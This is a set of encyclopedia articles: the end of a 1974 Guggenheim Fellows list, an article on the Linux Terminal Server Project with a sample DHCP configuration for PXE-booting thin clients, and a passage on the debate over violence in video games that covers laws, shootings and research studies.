of History, University of Florida. Gabrielle Yablonsky, Research Associate, Center for South and Southeast Asian Studies, University of California, Berkeley. Susan Yankowitz, playwright, New York City. Robert Yaris, Professor of Chemistry, Washington University. Al Young, writer, Palo Alto, California. John A. Yount, writer; Emeritus Professor of English, University of New Hampshire. Harris P. Zeigler, Distinguished University Professor of Psychology, Hunter College, City University of New York. Paul F. Zweifel, University Distinguished Professor Emeritus, Virginia Polytechnic Institute and State University. 
Latin American and Caribbean Fellows René Acuña-Sandoval, research ethnohistorian, Institute of Philological Research, National Autonomous University of Mexico: 1974, 1983. Lea Baider, Associate Professor, Medical Psychology, Director, Psycho-Oncology Unit, Sharett Institute of Oncology, Jerusalem. José Francisco S. Bianco, deceased. Fiction. Alfredo Bryce Echenique, writer, Spain. Augusto Ricardo Cardich, Professor Emeritus of American Archaeology, National University of La Plata. Marcelino Cereijido, Professor of Physiology, Center for Research and Advanced Studies, National Polytechnic Institute, Mexico City. Miguel Condé, artist (painting, drawing and etching), Madrid and Barcelona, Spain. Héctor Luis D'Antoni, Senior Research Scientist, NASA Ames Research Center, Moffett Field, California. Humberto Díaz Casanueva, deceased. General Nonfiction. Manuel Felguérez, artist; Instructor in the Visual Arts, National School of Plastic Arts, National Autonomous University of Mexico. Juan H. Fernández, Professor of Biology, University of Chile. Erasmo Madureira Ferreira, Professor of Physics, Federal University of Rio de Janeiro. Risieri Frondizi (1910-1983), Philosophy. Juan José Gurrola Iturriaga, playwright; advisor for cultural affairs, National Autonomous University of Mexico. Celia Jakubowicz de Matzkin, Research Associate, Laboratory of Experimental Psychology, University of Paris V. Pablo Macera, Professor of Social Sciences, National University of San Marcos. Clodomiro Marticorena, Professor of Botany, University of Concepción. Luiz C. M. Miranda, Technical Director, Institute of Advanced Studies, Aerospace Technological Institute, São José dos Campos, Brazil. Norma Bahia Pontes, filmmaker, Rio de Janeiro. aka Bahia, Norma. Alberto Carlos Riccardi, Professor of Paleontology, National University of La Plata; Head, Division of Invertebrate Paleozoology, Museum of La Plata. Neantro Saavedra Rivano, Professor of Mathematics, Simón Bolívar University. Juan Alberto Schnack, Career Investigator, National Council of Argentina; Instructor, Institute of Limnology, University of La Plata. Javier Sologuren Moreno, writer, Lima, Peru. Mario Suwalsky Weinzimmer, Professor of Chemistry, University of Concepción. Mario Toral, artist, New York City. Roberto Torretti, Professor of Philosophy, University of Puerto Rico, Río Piedras: 1974, 1980. Claudio Véliz, Director, University Professors Program, Boston University. Mario Vergara Martínez, Professor of Geology, University of Chile. See also Guggenheim Fellowship External links Guggenheim Fellows for 1974 1974 1974 awards
954473
https://en.wikipedia.org/wiki/Linux%20Terminal%20Server%20Project
Linux Terminal Server Project
Linux Terminal Server Project (LTSP) is a free and open source terminal server for Linux that allows many people to simultaneously use the same computer. Applications run on the server, with a terminal known as a thin client (also known as an X terminal) handling input and output. Generally, terminals are low-powered, lack a hard disk, and are quieter and more reliable than desktop computers because they do not have any moving parts. This technology is becoming popular in schools, as it allows a school to provide pupils with access to computers without purchasing or upgrading expensive desktop machines. Improving access to computers becomes less costly as thin client machines can be older computers that are no longer suitable for running a full desktop OS. Even a relatively slow CPU with as little as 128 MB of RAM can deliver excellent performance as a thin client. In addition, the use of centralized computing resources means that more performance can be gained for less money through upgrades to a single server rather than across a fleet of computers. By converting existing computers into thin clients, an educational institution can also gain more control over how its students are using computing resources, as all of the user sessions can be monitored on the server. See Epoptes, a lab management tool. The founder and project leader of LTSP is Jim McQuillan, and LTSP is distributed under the terms of the GNU General Public License. The LTSP client boot process On the LTSP server, a chroot environment is set up with a minimal Linux operating system and X environment. Either the computer boots from a local boot device (such as a hard disk, CD-ROM, or USB disk), loading a small Linux kernel from that device which initializes the system and all of the peripherals that it recognizes, or the thin client uses PXE or network booting, a part of the onboard Ethernet firmware, to request an IP address and boot server (the LTSP server) using the DHCP protocol. A PXE bootloader (PXELINUX) is then loaded, which in turn retrieves a Linux kernel and initrd from a Trivial File Transfer Protocol (TFTP) service usually running on the LTSP server (a configuration sketch for this DHCP/TFTP handoff is shown below). Using the utilities in the initrd, the kernel will request a (new) DHCP IP address and the address of a server from which it can mount its root filesystem (the chroot mentioned above). When this information is retrieved, the client mounts the path as its root filesystem via either the Network File System (NFS) or Network Block Device (NBD) services running on the LTSP server. The client then loads Linux from the NFS-mounted root filesystem (or NBD filesystem image) and starts the X Window System. At this point, the client connects to the XDMCP login manager on the LTSP server. In the case of the newer MueKow (LTSP v5.x) setup, the client first builds an SSH tunnel to the LTSP server's X environment, through which it will start the LDM (LTSP Display Manager) login manager locally. From this point forward, all programs are started on the LTSP server, but displayed and operated from the client. Scalability Initially, the MILLE-Xterm project, funded by Canadian public agencies and school districts in the province of Quebec, created a version of LTSP integrating four subprojects: a portal (based on uPortal), an open-source middleware stack, a CD with free software for Windows/Mac and, finally, MILLE-Xterm itself. The MILLE-Xterm project's goal was to provide a scalable infrastructure for massive X terminal deployment.
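The DHCP/TFTP handoff referenced in the boot process above is typically configured on the LTSP server itself. The following is a minimal, illustrative sketch of an ISC DHCP server configuration (dhcpd.conf) for PXE-booting thin clients; the subnet, addresses, and file paths are assumptions chosen for the example rather than values required by LTSP.

```
# Illustrative dhcpd.conf fragment for an LTSP server (addresses and paths are assumptions)
subnet 192.168.67.0 netmask 255.255.255.0 {
    range 192.168.67.20 192.168.67.250;   # address pool handed out to thin clients
    option routers 192.168.67.1;          # the LTSP server acting as the gateway
    next-server 192.168.67.1;             # TFTP server from which the PXE bootloader is fetched
    filename "/ltsp/i386/pxelinux.0";     # PXE bootloader retrieved over TFTP
    option root-path "/opt/ltsp/i386";    # path to the client's root filesystem (the chroot), exported via NFS or served as an NBD image
}
```

In this sketch, next-server and filename point the client's PXE firmware at the TFTP service and bootloader, while root-path tells the booted initrd where to find the root filesystem described in the boot process above.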
MILLE means Modèle d'Infrastructure Logiciel Libre en Éducation (Free Software Infrastructure Model for Education) and is targeted at educational institutions. As of 2009, MILLE-Xterm was integrated back into the LTSP as LTSP-cluster, a project specializing in the large-scale deployment of LTSP. One of the main differences between LTSP and LTSP-cluster is the integration of a web-based central control center, which replaces the traditional "one configuration file per thin client" model of customization used through LTSP's lts.conf file in mainline LTSP. LTSP-cluster allows organizations to centrally manage thousands of thin clients and their parameters from a central location. In LTSP-cluster, high-availability and high-performance thin clients are specified through the optional use of redundant components. Services that can be load-balanced and made highly available are the DHCP server, the TFTP server, the boot servers (which provide the root filesystem for the thin clients), the application servers, and the control center (a PostgreSQL database plus web frontend). LTSP-Cluster can support Linux application servers as well as Windows application servers and provides a similar level of support, centralized management, high-availability, and load-balancing features for both platforms. Also included is support for virtual desktops for remote users using NX technology. The NX protocol can allow remote Windows and Linux sessions to be accessed from a web browser with very low bandwidth (40 kbit/s) requirements and tolerance for high-latency connections. The NX client runs on various operating systems including Linux, Mac, and Windows. Fat clients LTSP v5.x added support for a client type known as "fat clients". With the advent of inexpensive, relatively powerful computer hardware, the idea of running applications locally on the thin client while offering the manageability of a thin client solution became a reality. In the case of an LTSP fat client, the root filesystem is not a rudimentary chroot but a full Linux installation held as a chroot. The fat client uses LDM to authenticate to the LTSP server and mounts user home directories using SSH and FUSE. The local CPU and RAM are used on the fat clients, which provides a few benefits: the LTSP server does not suffer from users abusing resources and affecting the performance and availability of the server for other users, and multimedia and 3D applications perform better while using less network bandwidth. LTSP is unique in offering the ability for a computer to mount its root filesystem over a network and run applications locally. On the Windows platform, the closest equivalent solution is to use a technology like Intel vPro to run a client-side hypervisor and mount the root filesystem image using iSCSI. See also Diskless Remote Boot in Linux: similar booting system to LTSP fat clients Multiseat configuration RULE Project Sun Ray Time-sharing VT100 Windows MultiPoint Server References External links LTSP Cluster official website Linux Servers (computing) Remote desktop X Window System Thin clients
40357187
https://en.wikipedia.org/wiki/Violence%20and%20video%20games
Violence and video games
Since their inception in the 1970s, video games have often been criticized for violent content. Politicians, parents, and other activists have claimed that violence in video games can be tied to violent behavior, particularly in children, and have sought ways to regulate the sale of video games. Numerous studies have shown no connection between video games and violent behavior; the American Psychological Association states that there is little to no evidence connecting video games to violent behavior, though it does state that an increase in aggression can result from playing violent video games. Background The Entertainment Software Association reports that 17% of video game players are boys under the age of eighteen and that 36% are women over the age of eighteen, with 48% of all gamers being women of all ages. They also report that the average age of gamers is 31. A survey of 1,102 children between 12 and 17 years of age found that 97% are video game players who have played in the last day and that 75% of parents checked the content rating on a video game before allowing their child to purchase it. Of these children, 14% of girls and 50% of boys favored games with an "M" (mature) or "AO" (adult-only) rating. 64% of American adults and 70% of those under 18 play video games regularly as of 2020. Since the late 1990s, some real-world acts of violence have been highly publicized in relation to beliefs that the suspect in the crime may have had a history of playing violent video games. The 1999 Columbine High School massacre created a moral panic around video games, spurring research to see if violent video games lead to aggressive behaviors in real life. Some research finds that violent video game use is correlated with, and may cause, increases in aggression and decreases in prosocial behavior. Other research argues that there are no such effects of violent video games. This link between violent video games and antisocial behavior was denied by the president of the Interactive Digital Software Association in 2005 in a PBS interview. In the interview, he stated that the problem is "…vastly overblown and overstated…" by people who "…don't understand, frankly, this industry". Others have theorized that there are positive effects of playing video games, including prosocial behavior in some contexts, and argue that the video game industry has been used as a scapegoat for more generalized problems affecting some communities. History Before video games Elements of the type of moral panic that came with video games after they gained popularity had previously been seen with comic books. Through the 1950s, comics were in their Golden Age, having become a widely popular form of media. As the medium expanded, some artists and publishers took more risks with violent and otherwise questionable content. Fredric Wertham, a psychiatrist, wrote Seduction of the Innocent in 1954, which outlined his studies asserting that violent comics were a negative form of literature and led to juvenile delinquency. Even though some of Wertham's claims were later found to be based on flawed studies, the book created a moral panic that put pressure on the comic book industry to regulate its works. Later in 1954, the comic industry established the Comics Code Authority (CCA), which put strict regulations on content that could appear in comic books sold at most stores, eliminating most violence and other mature content via self-censoring.
The mainstream comic industry waned as comics had lost their edge, while an underground market for more adult comics formed. The comic industry did not recover from Comics Code Authority regulations until the 1970s, when adherence to the Authority weakened. By the 2000s, the Authority was generally no longer observed. Modern trends of targeting violence in video games have been compared to these events in the comic industry, and video game industry leaders have specifically avoided the kind of self-censorship that could impact the performance of the industry. Pinball machines had also created a moral panic in post-World War II America, as the teenage rebels of the 1950s and 1960s would frequently hang around establishments with pinball machines, which created fear across the generation gap among older Americans unsure of the intentions of this younger crowd. To some, pinball appeared to be a form of gambling (which led to machines being labeled "For Amusement Only"), while more religious people feared pinball was a "tool of the devil". Because of this, many cities and towns banned pinball machines or implemented strict licensing requirements, which were slowly lifted in the late 1960s and early 1970s. Notably, New York City's ban on pinball machines lasted until 1976, while Chicago's was lifted in 1977. The appearance of video games in the early 1970s overlapped with the lifting of bans on pinball machines, and when youth were drawn to arcade games, the same concerns that were initially leveled at pinball machines as gambling machines and immoral playthings were also made about video games. 1970s–1980s After Pong exploded onto the arcade game market, arcade game manufacturers were aware of the attention that video games were getting and tried to position games as entertainment aimed at adults, selling units preferably to bars and lounges. This gave them more leeway with content, but it still drew criticism from some. Two arcade games had already drawn attention for amoral content prior to 1976. Atari's Gotcha in 1973, a maze game, initially shipped with two joystick units covered in pink domes meant to represent women's breasts; these were removed in later production runs. The 1975 Shark Jaws, also by Atari, was an unlicensed adaptation of the film Jaws and attempted to play on the film's violent context, though here the player was hunted by the shark. As arcade games spread into more locations, the ease with which children could access the games also elevated concerns about their potential impacts. The 1976 arcade game Death Race is considered the first game to be targeted for its violent content. The game, like Shark Jaws, was an unlicensed adaptation of the 1975 film Death Race 2000, a violent film centered on driving. Within the game, the player was challenged to drive a car and run over simulated gremlins, scoring points for doing so. Besides the game's simulated content, the game cabinet was also adorned with imagery of death. The game caught the attention of an Associated Press writer, Wendy Walker, who contacted the game's manufacturer, Exidy, with her concerns that the game was excessively violent. Walker's concerns spread through other media organizations, including the National Safety Council, which accused the game of glorifying the act of running people over at a time when the Council was trying to educate drivers about safe driving practices. While some arcades subsequently returned the Death Race machines due to this panic, sales of the game continued to grow due to the media coverage.
Many other competing arcade games of the time, like Cops 'n' Robbers, Tank 8, and Jet Fighter, were equally about violent actions yet saw little complaint. Nolan Bushnell of Atari said, "We [Atari] had an internal rule that we wouldn't allow violence against people. You could blow up a tank or you could blow up a flying saucer, but you couldn't blow up people. We felt that that was not good form, and we adhered to that all during my tenure." United States Surgeon General C. Everett Koop was one of the first to raise concerns about the potential connection of video games to youth behavior. In 1982, Koop stated as a personal observation that "more and more people are beginning to understand" the connection between video games and mental and physical health effects on youth, though he noted that at that time there was not sufficient evidence to draw any conclusion. 1990s Mortal Kombat and congressional hearings (1993–1994) The fighting game Mortal Kombat was released into arcades in 1992. It was one of the first games to depict a large amount of blood and gore, particularly during special moves known as "Fatalities" used to finish off the losing character. Numerous arcade games that used high amounts of violent content followed in Mortal Kombat's wake. However, as these games were originally exclusive to arcade machines, it was generally possible to segregate them from games aimed at younger players. Eventually, there was significant interest from home console manufacturers in licensing Mortal Kombat from Midway Games, particularly from Sega for its Sega Genesis platform and Nintendo for the Super Nintendo Entertainment System. At the time, Sega and Nintendo were in the midst of a console war to try to gain dominance in the United States market. Sega's licensed version of Mortal Kombat retained all the gore from the arcade version (though it required the use of a cheat code to activate it), while Nintendo had a version developed that removed most of the gore, recoloring the blood as grey "sweat" and otherwise toning down the game. Sega's version drastically outsold Nintendo's version and intensified the competition between the two companies. The popularity of Mortal Kombat, along with the full-motion video game Night Trap and the light gun shooting game Lethal Enforcers, gained attention from U.S. Senators Joe Lieberman and Herb Kohl. This resulted in two congressional hearings in 1993 and 1994 to discuss the issues of violence and video games with concerned advocacy groups, academics, and the video game industry. Sega, Nintendo, and others were criticized for lacking a standardized content rating system, and Lieberman threatened to have Congress pass legislation requiring a system with government oversight if the industry did not take its own steps. By the time of the second hearing, Sega, Nintendo, and other console manufacturers had outlined their agreed-upon approach for a voluntary rating system through the Entertainment Software Rating Board (ESRB), which was in place by the end of 1994. This also led to the establishment of the Interactive Digital Software Association, later known as the Entertainment Software Association (ESA), a trade group for the video game industry that managed the ESRB and further supported trade-wide aspects such as government affairs. Jack Thompson lawsuits (1997) American attorney Jack Thompson has criticized a number of video games for perceived obscenity and campaigned against their producers and distributors.
He argues that violent video games have repeatedly been used by teenagers as "murder simulators" to rehearse violent plans. He has pointed to alleged connections between such games and a number of school massacres. Columbine High School massacre (1999) The Columbine High School massacre on April 20, 1999, reignited the debate about violence in video games. Among other factors, the perpetrators were found to be avid players of violent games like Doom. The public perceived a connection between video games and the shooting, leading to a Congressional hearing and President Bill Clinton ordering an investigation into school shootings and how video games were being marketed to youth. The report, released in 2004 by the United States Secret Service and the United States Department of Education, found that only 12% of perpetrators in school shootings had shown interest in video games. In the aftermath of the Columbine shooting, previous school shootings were re-evaluated by the media, and connections were drawn between Columbine and the Westside Middle School massacre of 1998. Although video games had not been identified as a factor at the time of the Westside shooting, media discussions of Columbine pointed to Westside as a similar case in that the two student perpetrators had often played GoldenEye 007 together and had enjoyed playing first-person shooter games prior to the shooting. 2000s Grand Theft Auto III and further lawsuits In 2001, Rockstar Games released the PlayStation 2 game Grand Theft Auto III. The game gave the player control of an unnamed protagonist in a contemporary urban setting who takes on missions within the city's criminal underworld. The game was one of the first open world games and allowed the player nearly free control of how they completed missions, which included gunplay, melee combat, and reckless driving. The game was wildly successful, selling over two million units within six months. Its popularity led several groups to criticize the violence in the game, among other factors. Rockstar subsequently released two follow-up games, Grand Theft Auto: Vice City in 2002 and Grand Theft Auto: San Andreas in 2004, the latter becoming controversial for the sexually explicit Hot Coffee mod. After this incident, legislators decided to take action: in 2005, California banned the sale of violent video games to minors. In the years that followed, a number of murders and other crimes committed by young adults and youth were found to have ties to Grand Theft Auto III and later games that followed in its footsteps. Jack Thompson became involved, attempting to sue Rockstar, its publisher Take-Two Interactive, and Sony on behalf of the victims for large amounts of damages, asserting that the violence in these games led directly to the crimes and thus that these companies were responsible for said crimes. These cases ultimately did not lead to any action against Rockstar, as they were either voluntarily withdrawn or dismissed before judgment. Thompson agreed to no longer seek legal action against Take-Two's games, and ultimately became an activist highlighting the issue of violence in video games. The events of this period were made into a BBC docudrama, The Gamechangers, which was first broadcast in September 2015. Winnenden school shooting (2009) The shooter in the Winnenden school shooting on March 11, 2009, in Winnenden, Germany, was found to have had an interest in video games like Counter-Strike and Far Cry 2.
In the weeks that followed, politicians and concerned citizens tried to pressure the government into passing legislation to ban the sale of violent video games in the country, though this never came to pass. Call of Duty: Modern Warfare 2 "No Russian" (2009) The 2009 first-person shooter Call of Duty: Modern Warfare 2 included a controversial mission in its story mode called "No Russian". In the mission, the player takes on the role of a CIA agent who has embedded himself among a Russian ultranationalist terrorist group; the leader of the group warns them to speak "no Russian" so as not to give away their origins. The mission allows the player to participate in a terrorist attack at a Moscow airport, during which they may fire indiscriminately on civilians and security alike. Participation in the mission is not mandatory: a disclaimer before the mission begins warns the player about the violent content and gives the option to skip the level. If the player chooses to play the level, they are not required to participate in the shooting in order to complete it. The level ends when the terrorist group's leader kills the player-character in order to frame the attack as the work of the United States, leading to a world war. The existence of the level leaked before the game's release, forcing publisher Activision and developer Infinity Ward to respond to journalists and activists who were critical of the concept of the mission. Activision defended the level's inclusion in the finished game, emphasizing that the mission was not representative of the rest of the game and that initial assessments had taken the level out of context. Even with the full game's release, "No Russian" was still criticized, with some stating that video games had yet to mature. The mission is considered a watershed moment for the video game industry, in how certain depictions of violence can be seen as acceptable while others, like "No Russian", are considered unacceptable. 2010s Brown v. Entertainment Merchants Association (2011) To address violent video games, several U.S. states passed laws that restricted the sale of mature video games, particularly those with violent or sexual content, to children. Video game industry groups fought these laws in courts and won. The most significant case came out of a challenge to a California law passed in 2005 that banned the sale of mature games to minors and required an enhanced content rating system beyond the ESRB's. Industry groups fought this and won, but the case ultimately made it to the Supreme Court of the United States. In Brown v. Entertainment Merchants Association, the Supreme Court ruled that video games were a protected form of speech, qualifying for First Amendment protections, and that laws like California's, which block sales on a basis outside of the Miller test, were unconstitutional. Justice Antonin Scalia, who wrote the majority opinion, considered that violence in many video games was no different from that presented in other children's media, such as Grimm's Fairy Tales. Sandy Hook Elementary School shooting (2012) The Sandy Hook Elementary School shooting occurred on December 14, 2012. The perpetrator, Adam Lanza, was found to have a "trove" of video games, as described by investigating officials, including several games considered to be violent. This discovery started a fresh round of calls against violent video games in political and media circles, including a meeting on the topic between U.S.
Vice President Joe Biden and representatives from the video game industry. The National Rifle Association accused the video game industry for the shooting, identifying games that focused on shooting people in schools. Munich Olympia Mall shooting (2016) The 2016 Munich shooting occurred on July 22, 2016, in the vicinity of the Olympia Shopping Mall in the Moosach District of Munich, Bavaria, Germany. The perpetrator, David Sonboly, killed 10 people before killing himself when surrounded by police. As a result, the German Minister of the Interior, Thomas de Maizière, claimed that the "intolerable extent of video games on the internet" has a harmful effect on the development of young people. His statements were criticized by media specialist Maic Mausch, who said with regards to Maiziere's statement that "No sensible scientist can say that with such certainty. And if no scientist can do it, no minister can do that." Parkland school shooting (2018) The Stoneman Douglas High School shooting occurred on February 14, 2018, in Parkland, Florida. In the aftermath, Kentucky Governor Matt Bevin declared that the country should re-evaluate "the things being put in the hands of our young people", specifically "quote-unquote video games" that "have desensitized people to the value of human life". A month later, President Donald Trump called for several industry representatives and advocates to meet in Washington, D.C. to discuss the impact of violent video games with him and his advisors. Industry leaders included Michael Gallagher, ESA president; Patricia Vance, ESRB president; Robert Altman, CEO of ZeniMax Media; and Strauss Zelnick, CEO of Take-Two, while advocates included Brent Bozell, of the Media Research Center and Melissa Henson of the Parents Television Council. While the video game industry asserted the lack of connection between violent video games and violent acts, their critics asserted that the industry should take steps to limit youth access and marketing to violent video games in ways similar to the approaches taken for alcohol and tobacco use. Suzano school shooting (2019) The Suzano school shooting occurred on March 13, 2019, at the Professor Raul Brasil State School in the Brazilian municipality of Suzano, São Paulo. The perpetrators, Guilherme Taucci Monteiro and Luiz Henrique de Castro, managed to kill five school students and two school employees before Monteiro killed Castro and then committed suicide. As a result, Brazilian Vice President Hamilton Mourão claimed that young people are addicted to violent video games, while also claiming that the work routine of Brazilian parents made it harder for young people to be raised properly. As a result, the hashtag #SomosGamersNãoAssassinos (“#WeAreGamersNotMurderers”) gained popularity in Brazil. August 2019 shootings Two mass shootings occurring within a day of each other, one in El Paso, Texas and another in Dayton, Ohio, in August 2019 provoked political claims that video games were partially to blame for the incidents. U.S. President Donald Trump stated days after the shootings, "We must stop the glorification of violence in our society. This includes the gruesome and grisly video games that are now commonplace". House Minority Leader Kevin McCarthy also blamed video games for these events, stating, "I've always felt that it’s a problem for future generations and others. 
We've watched from studies, shown before, what it does to individuals, and you look at these photos of how it took place, you can see the actions within video games and others." News organizations and the video game industry reiterated the findings of the past, that there was no link between video games and violent behavior, and criticized politicians for taking video games to task when the underlying issue lay with gun control. Halle synagogue shooting (2019) The Halle synagogue shooting occurred on October 9, 2019, in Halle, Saxony-Anhalt, Germany, continuing in nearby Landsberg. The suspect, identified by the media as Stephan Balliet, was influenced by far-right ideology and managed to live-stream his attack on Facebook and Twitch. In the course of the attack, he killed two people before being subdued by police. Given the live-streamed nature of the attack, German Minister of the Interior Horst Seehofer claimed, with regard to incidents like the shooting in Halle, that "many of the perpetrators or the potential perpetrators come from the gaming scene". His comments received widespread criticism from German gamers and politicians, such as SPD general secretary Lars Klingbeil, who stated that "The problem is right-wing extremism, not gamers or anything else." 2020s School shooting in Torreón, Mexico (2020) Hours after a school shooting in Torreón, Coahuila, Mexico, in January 2020, the governor of that state, Miguel Ángel Riquelme Solís, stated that the 11-year-old shooter was wearing a T-shirt with the legend Natural Selection and could have been influenced by the game. The governor's comment sparked a debate about the link between violence and video games. Erik Salazar Flores of the College of Psychology of the National Autonomous University of Mexico (UNAM) stated that blaming video games for violence is an "easy way out" for authorities who wish to ignore the complexity of the problem. Dalila Valenzuela, a sociologist from the Autonomous University of Baja California, said that video games influence children's behavior but that the parents are most directly responsible. Studies Broadly, researchers have not found any connection between violent video games and violent behavior. The policy statement of the American Psychological Association (APA) related to video games states that "Scant evidence has emerged that makes any causal or correlational connection between playing violent video games and actually committing violent activities." The APA has acknowledged that video games may lead to aggressive behavior, as well as anti-social behavior, but clarifies that not all aggressive behavior is necessarily violent. A 2015 APA review of current studies in this area led the APA to conclude that violent video games led to aggressive behavior, "manifested both as an increase in negative outcomes such as aggressive behavior, cognition, and affect and as a decrease in positive outcomes such as prosocial behavior, empathy, and sensitivity to aggression." However, the APA recognized that the samples in these studies tended not to be representative of normal demographics. In its 2015 Resolution on Violent Video Games, the APA vowed to further research to better understand the connection between violent video games and aggression, and how aggressive activities may lead to violent actions, as well as to educate politicians and the media about its findings.
Further, the APA issued a policy statement in 2017 aimed at politicians and the media, urging them to avoid linking violent video games with violent crimes and reiterating its findings over the years. In a follow-up statement in 2020, the APA reaffirmed that there remains insufficient evidence to link video games to violent behavior. It had found that there was a "small, reliable association between violent video game use and aggressive outcomes, such as yelling and pushing", but could not extend that to more violent activities. Christopher Ferguson, a professor at Stetson University and a member of the APA, has researched the connection between violent video games and violent behavior for years. Through longitudinal studies, he has concluded that "[t]here's not evidence of a correlation, let alone a causation" between video games and violence. Ferguson's more recent studies have shown that playing violent video games is not predictive of later violent behavior. Negative effects of video games Theories of negative effects of video games tend to focus on players' modeling of behaviors observed in the game. These effects may be exacerbated by the interactive nature of these games. The most well-known theory of such effects is the General Aggression Model (GAM), which proposes that playing violent video games may create cognitive scripts of aggression which will be activated in incidents in which individuals think others are acting with hostility. Playing violent video games thus becomes an opportunity to rehearse acts of aggression, which then become more common in real life. The general aggression model suggests the simulated violence of video games may influence a player's thoughts, feelings and physical arousal, affecting individuals' interpretation of others' behavior and increasing their own aggressive behavior. Some scholars have criticized the general aggression model, arguing that the model wrongly assumes that aggression is primarily learned and that the brain does not distinguish reality from fiction. Some recent studies have explicitly claimed to find evidence against the GAM. Parents can protect their children from the violence depicted in video games by limiting game usage and privileges. Some biological theories of aggression have specifically excluded video game and other media effects because the evidence for such effects is considered weak and the impact too distant. For example, the catalyst model of aggression comes from a diathesis-stress perspective, implying that aggression is due to a combination of genetic risk and environmental strain. The catalyst model suggests that stress, coupled with antisocial personality, is a salient factor leading to aggression. It does allow that proximal influences such as family or peers may alter aggressiveness, but not media and games. Research methods Research has focused on several aspects of the effects of video games on players: the player's health measures and educational achievements as a function of the amount of game play; the players' behavior or perceptions as a function of the game's violence levels; the context of the game play in terms of group dynamics; the game's structure, which affects players' visual attention or three-dimensional constructional skills; and the mechanics of the game, which affect hand–eye coordination.
Two research methods have been used: experimental studies (in a laboratory), where the different environmental factors can be controlled, and non-experimental studies, where those who participate simply log their video gaming hours. Scientific debate A common theory is that playing violent video games increases aggression in young people. Various studies claim to support this hypothesis. Other studies find no link. Debate among scholars on both sides remains contentious, and there is argument about whether consensus exists regarding the effects of violent video games on aggression. Primary studies In 1998, Steven Kirsh reported in the journal Childhood that the use of video games may lead to acquisition of a hostile attribution bias. Fifty-five subjects were randomized to play either violent or non-violent video games. Subjects were later asked to read stories in which the characters' behavior was ambiguous. Participants randomized to play violent video games were more likely to provide negative interpretations of the stories. Another study, done by Anderson and Dill in 2000, found a correlation in undergraduate students between playing violent video games and violent crime, with the correlation stronger in aggressive male players, although other scholars have suggested that results from this study were not consistent and that the methodology was flawed. In 2001, David Satcher, the Surgeon General of the United States, said "We clearly associate media violence to aggressive behavior. But the impact was very small compared to other things. Some may not be happy with that, but that's where the science is." A 2002 US Secret Service study of 41 individuals who had been involved in school shootings found that twelve percent were attracted to violent video games, twenty-four percent read violent books and twenty-seven percent were attracted to violent films. Some scholars have indicated that these numbers are unusually low compared to violent media consumption among non-criminal youth. In 2003, a study was conducted at Iowa State University assessing pre-existing attitudes and violence in children. The study concerned children between ages 5 and 12 who were assessed for the typical amount of time they played video games per week and for pre-existing empathy and attitudes towards violence. The children played a violent or non-violent video game for approximately 15 minutes. Afterwards, their pulse rates were recorded, and the children were asked how frustrating the games were on a 1–10 scale. Last, the children were given drawings (vignettes) of everyday situations, some more likely to be followed by aggressive actions and others by empathetic actions. Results showed that there were no significant effects of video game playing in the short term, with violent video games and non-violent video games producing no significant differences, indicating that children do not show decreased empathy immediately after playing violent video games. Conversely, children who played more violent video games over a long period of time showed lower pre-existing empathy and also lower scores on the empathy-inducing vignettes, indicating long-term effects. It is possible that the video games had not primed children for the particular aggression scenarios. These data could indicate that desensitization in children can occur after long-term exposure, but not all children were affected in the same way, so the researchers deduced that some children may be at a higher risk of these negative effects.
It is possible that fifteen minutes is not quite long enough to produce short-term cognitive effects. In 2003, Jeanne B. Funk and her colleagues at the Department of Psychology at the University of Toledo examined the relationship between exposure to violence through media and real life and desensitization (reflected by loss of empathy and changes in attitudes toward violence) in fourth and fifth grade pupils. Funk found that exposure to video game violence was associated with lowered empathy and stronger proviolence attitudes. Another study from 2003, by John Colwell at the University of Westminster, found that violent video game playing was associated with reduced aggression among Japanese youth. The American Psychological Association (APA) released an official statement in 2005. It said that exposure to violent media increases feelings of hostility, thoughts about aggression and suspicions about the motives of others, and demonstrates violence as a method to deal with potential conflict situations; that comprehensive analysis of violent interactive video game research suggests such exposure increases aggressive behavior, thoughts, angry feelings and physiological arousal, and decreases helpful behavior; and that studies suggest that sexualized violence in the media has been linked to increases in violence towards women, rape myth acceptance and anti-women attitudes. The statement also said that the APA advocates reduction of all violence in video games and interactive media marketed to children and youth; that research should be conducted on the role of social learning, sexism, negative depiction of minorities, and gender in the effects of violence in video games and interactive media on children, adolescents, and young adults; and that the APA engages those responsible for developing violent video games and interactive media in addressing the concern that playing violent video games may increase aggressive thoughts and aggressive behaviors in children, youth, and young adults, and that these effects may be greater than the well-documented effects of exposure to violent television and movies. The APA also recommended to the entertainment industry that the depiction of the consequences of violent behavior be associated with negative social consequences, and it supported a rating system which accurately reflects the content of video games and interactive media. The statement was updated in 2015 (see below). Some scholars suggested that the APA's policy statement ignored discrepant research and misrepresented the scientific literature. In 2013, a group of over 230 media scholars wrote an open letter to the APA asking it to revisit and greatly amend its policy statement on video game violence, on the grounds that the evidence was mixed. Signatories to the 2013 letter included psychologists Jeffrey Arnett, Randy Borum, David Buss, David Canter, Lorenza Colzato, M. Brent Donnellan, Dorothy Espelage, Frank Farley, Christopher Ferguson, Peter Gray, Mark D. Griffiths, Jessica Hammer, Mizuko Ito, James C. Kaufman, Dana Klisanin, Catherine McBride-Chang, Jean Mercer, Hal Pashler, Steven Pinker, Richard M. Ryan, Todd K. Shackelford, Daniel Simons, Ian Spence, and Dean Simonton, criminologists Kevin Beaver, James Alan Fox, Roger J.R. Levesque, and Mike A. Males, game design researchers Bob De Schutter and Kurt Squire, communications scholar Thorsten Quandt, and science writer Richard Rhodes. In 2005, a study by Bruce D. 
Bartholow and colleagues at the University of Missouri, University of Michigan, Vrije Universiteit, and University of North Carolina using event-related potentials linked video game violence exposure to brain processes hypothetically reflecting desensitization. The authors suggested that chronic exposure to violent video games has lasting harmful effects on brain function and behavior. In 2005, a study at Iowa State University, the University of Michigan, and Vrije Universiteit by Nicholas L. Carnagey and colleagues found that participants who had previously played a violent video game had lower heart rate and galvanic skin response while viewing filmed real violence, demonstrating a physiological desensitization to violence. In 2007, a study at the Swinburne University of Technology found that children had variable reactions to violent games, with some children becoming more aggressive, some becoming less aggressive, but the majority showing no changes in behavior. In 2008, a longitudinal study conducted in Japan assessed possible long-term effects of video game playing in children. The final analysis consisted of 591 fifth graders aged 10–11 across eight public elementary schools, and was conducted over the course of a year. Initially, children were asked to complete a survey which assessed the presence or absence of violence in the children's favorite video games, as well as video game context variables that may affect the results and the aggression levels of the children. Children were assessed again for these variables a year later. Results revealed a significant gender difference, with boys showing significantly more aggressive behavior and anger than girls, which the authors attributed to boys' elevated interest in violent video games. However, the interaction between time spent gaming and preference for violent games was associated with reduced aggression in boys but not girls. The researchers also found that eight of the context 